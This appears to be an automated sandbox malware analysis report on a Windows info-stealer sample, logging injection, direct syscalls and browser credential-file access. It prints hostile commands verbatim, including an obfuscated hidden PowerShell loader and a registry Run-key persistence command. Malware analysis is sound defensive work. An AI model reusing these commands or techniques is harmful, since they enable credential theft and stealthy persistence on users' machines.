Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2046A9D0 mov eax, dword ptr fs:[00000030h] 8_2_2046A9D0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204949D0 mov eax, dword ptr fs:[00000030h] 8_2_204949D0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204EE9E0 mov eax, dword ptr fs:[00000030h] 8_2_204EE9E0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204929F9 mov eax, dword ptr fs:[00000030h] 8_2_204929F9
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204729A0 mov eax, dword ptr fs:[00000030h] 8_2_204729A0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204609AD mov eax, dword ptr fs:[00000030h] 8_2_204609AD
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E89B3 mov esi, dword ptr fs:[00000030h] 8_2_204E89B3
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E89B3 mov eax, dword ptr fs:[00000030h] 8_2_204E89B3
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20466A50 mov eax, dword ptr fs:[00000030h] 8_2_20466A50
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20470A5B mov eax, dword ptr fs:[00000030h] 8_2_20470A5B
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2049CA6F mov eax, dword ptr fs:[00000030h] 8_2_2049CA6F
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2050EA60 mov eax, dword ptr fs:[00000030h] 8_2_2050EA60
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204DCA72 mov eax, dword ptr fs:[00000030h] 8_2_204DCA72
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204ECA11 mov eax, dword ptr fs:[00000030h] 8_2_204ECA11
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2048EA2E mov eax, dword ptr fs:[00000030h] 8_2_2048EA2E
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2049CA24 mov eax, dword ptr fs:[00000030h] 8_2_2049CA24
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2049CA38 mov eax, dword ptr fs:[00000030h] 8_2_2049CA38
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20484A35 mov eax, dword ptr fs:[00000030h] 8_2_20484A35
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204B6ACC mov eax, dword ptr fs:[00000030h] 8_2_204B6ACC
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20460AD0 mov eax, dword ptr fs:[00000030h] 8_2_20460AD0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20494AD0 mov eax, dword ptr fs:[00000030h] 8_2_20494AD0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2049AAEE mov eax, dword ptr fs:[00000030h] 8_2_2049AAEE
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2046EA80 mov eax, dword ptr fs:[00000030h] 8_2_2046EA80
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20534A80 mov eax, dword ptr fs:[00000030h] 8_2_20534A80
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20498A90 mov edx, dword ptr fs:[00000030h] 8_2_20498A90
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20468AA0 mov eax, dword ptr fs:[00000030h] 8_2_20468AA0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204B6AA4 mov eax, dword ptr fs:[00000030h] 8_2_204B6AA4
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2050EB50 mov eax, dword ptr fs:[00000030h] 8_2_2050EB50
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20532B57 mov eax, dword ptr fs:[00000030h] 8_2_20532B57
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204F6B40 mov eax, dword ptr fs:[00000030h] 8_2_204F6B40
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2052AB40 mov eax, dword ptr fs:[00000030h] 8_2_2052AB40
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20508B42 mov eax, dword ptr fs:[00000030h] 8_2_20508B42
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20458B50 mov eax, dword ptr fs:[00000030h] 8_2_20458B50
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20514B4B mov eax, dword ptr fs:[00000030h] 8_2_20514B4B
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2045CB7E mov eax, dword ptr fs:[00000030h] 8_2_2045CB7E
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204DEB1D mov eax, dword ptr fs:[00000030h] 8_2_204DEB1D
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20534B00 mov eax, dword ptr fs:[00000030h] 8_2_20534B00
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2048EB20 mov eax, dword ptr fs:[00000030h] 8_2_2048EB20
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20528B28 mov eax, dword ptr fs:[00000030h] 8_2_20528B28
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2050EBD0 mov eax, dword ptr fs:[00000030h] 8_2_2050EBD0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20480BCB mov eax, dword ptr fs:[00000030h] 8_2_20480BCB
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20460BCD mov eax, dword ptr fs:[00000030h] 8_2_20460BCD
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2048EBFC mov eax, dword ptr fs:[00000030h] 8_2_2048EBFC
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20468BF0 mov eax, dword ptr fs:[00000030h] 8_2_20468BF0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204ECBF0 mov eax, dword ptr fs:[00000030h] 8_2_204ECBF0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe NtOpenKeyEx: Direct from: 0x77672B9C
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe NtProtectVirtualMemory: Direct from: 0x77672F9C
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe NtCreateFile: Direct from: 0x77672FEC
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe NtOpenFile: Direct from: 0x77672DCC
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe NtProtectVirtualMemory: Direct from: 0x77667B2E
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe NtQueryInformationToken: Direct from: 0x77672CAC
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe NtAllocateVirtualMemory: Direct from: 0x77672BEC
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe NtDeviceIoControlFile: Direct from: 0x77672AEC
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe NtQuerySystemInformation: Direct from: 0x776748CC
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe NtQueryAttributesFile: Direct from: 0x77672E6C
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe NtSetInformationThread: Direct from: 0x77672B4C
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe NtOpenSection: Direct from: 0x77672E0C
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe NtQueryVolumeInformationFile: Direct from: 0x77672F2C
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe NtAllocateVirtualMemory: Direct from: 0x776748EC
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe NtSetInformationThread: Direct from: 0x776663F9
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe NtReadVirtualMemory: Direct from: 0x77672E8C
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe NtCreateKey: Direct from: 0x77672C6C
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe NtClose: Direct from: 0x77672B6C
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe NtWriteVirtualMemory: Direct from: 0x7767490C
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe NtAllocateVirtualMemory: Direct from: 0x77673C9C
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe NtDelayExecution: Direct from: 0x77672DDC
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe NtCreateUserProcess: Direct from: 0x7767371C
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe NtQuerySystemInformation: Direct from: 0x77672DFC
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe NtQueryInformationProcess: Direct from: 0x77672C26
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe NtResumeThread: Direct from: 0x77672FBC
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe NtReadFile: Direct from: 0x77672ADC
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe NtAllocateVirtualMemory: Direct from: 0x77672BFC
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe NtResumeThread: Direct from: 0x776736AC
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe NtSetInformationProcess: Direct from: 0x77672C5C
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe NtMapViewOfSection: Direct from: 0x77672D1C
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe NtNotifyChangeKey: Direct from: 0x77673C2C
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe NtWriteVirtualMemory: Direct from: 0x77672E3C
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe NtCreateMutant: Direct from: 0x776735CC
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: NULL target: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: NULL target: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe protection: read write
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: NULL target: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\cmd.exe Thread register set: target process: 2180
Source: C:\Windows\SysWOW64\cmd.exe Thread APC queued: target process: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section unmapped: C:\Users\user\AppData\Local\Temp\Overfondle.exe base address: 400000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Users\user\AppData\Local\Temp\Overfondle.exe base: 1660000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Users\user\AppData\Local\Temp\Overfondle.exe base: 19FFF4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Indeterminative=Get-Content 'C:\Users\user\AppData\Local\Temp\Moviedom230\Enforcedly251\Afvrgningernes.Ign37';$Introducerer=$Indeterminative.SubString(18884,3);.$Introducerer($Indeterminative)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\Overfondle.exe "C:\Users\user\AppData\Local\Temp\Overfondle.exe"
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hakkebrttet" /t REG_EXPAND_SZ /d "%elaf% -windowstyle minimized $Ultramicrotome=(Get-ItemProperty -Path 'HKCU:\noncoherent\').Skvadredes;%elaf% ($Ultramicrotome)"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hakkebrttet" /t REG_EXPAND_SZ /d "%elaf% -windowstyle minimized $Ultramicrotome=(Get-ItemProperty -Path 'HKCU:\noncoherent\').Skvadredes;%elaf% ($Ultramicrotome)" Jump to behavior
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "hakkebrttet" /t reg_expand_sz /d "%elaf% -windowstyle minimized $ultramicrotome=(get-itemproperty -path 'hkcu:\noncoherent\').skvadredes;%elaf% ($ultramicrotome)"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Code function: 0_2_6EAC1096 GetModuleFileNameA,GlobalAlloc,CharPrevA,GlobalFree,GetTempFileNameA,CopyFileA,CreateFileA,CreateFileMappingA,MapViewOfFile,UnmapViewOfFile,CloseHandle,CloseHandle,lstrcatA,lstrlenA,GlobalAlloc,FindWindowExA,FindWindowExA,FindWindowExA,lstrcmpiA,lstrcmpiA,lstrcmpiA,DeleteFileA,GetVersion,GlobalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreatePipe,CreatePipe,CreatePipe,GetStartupInfoA,RpcServerRegisterIf3,CreateProcessA,lstrcpyA,lstrcpyA,wsprintfA,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,DeleteFileA,GlobalFree,GlobalFree,GlobalFree,GetTickCount,WaitForSingleObject,GetExitCodeProcess,RpcServerRegisterIf3,PeekNamedPipe,GetTickCount,ReadFile,lstrcpyA,GlobalReAlloc,lstrcpyA,GetTickCount,TerminateProcess,lstrcpyA,Sleep, 0_2_6EAC1096
Source: rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000D.00000002.2615580282.0000000000D40000.00000002.00000001.00040000.00000000.sdmp, rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000D.00000000.2082661042.0000000000D40000.00000002.00000001.00040000.00000000.sdmp, rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000F.00000000.2234046773.0000000001950000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000D.00000002.2615580282.0000000000D40000.00000002.00000001.00040000.00000000.sdmp, rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000D.00000000.2082661042.0000000000D40000.00000002.00000001.00040000.00000000.sdmp, rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000F.00000000.2234046773.0000000001950000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000D.00000002.2615580282.0000000000D40000.00000002.00000001.00040000.00000000.sdmp, rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000D.00000000.2082661042.0000000000D40000.00000002.00000001.00040000.00000000.sdmp, rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000F.00000000.2234046773.0000000001950000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: EProgram Manager
Source: rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000D.00000002.2615580282.0000000000D40000.00000002.00000001.00040000.00000000.sdmp, rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000D.00000000.2082661042.0000000000D40000.00000002.00000001.00040000.00000000.sdmp, rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000F.00000000.2234046773.0000000001950000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Code function: 0_2_004033B3 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_004033B3

Stealing of Sensitive Information

Source: Yara match File source: 0000000E.00000002.2615858541.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2616564781.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2616210214.0000000000D20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2164570528.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2614202921.00000000003C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2184865476.0000000021B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2615828558.0000000003550000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\cmd.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality

Source: Yara match File source: 0000000E.00000002.2615858541.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2616564781.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2616210214.0000000000D20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2164570528.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2614202921.00000000003C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2184865476.0000000021B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2615828558.0000000003550000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY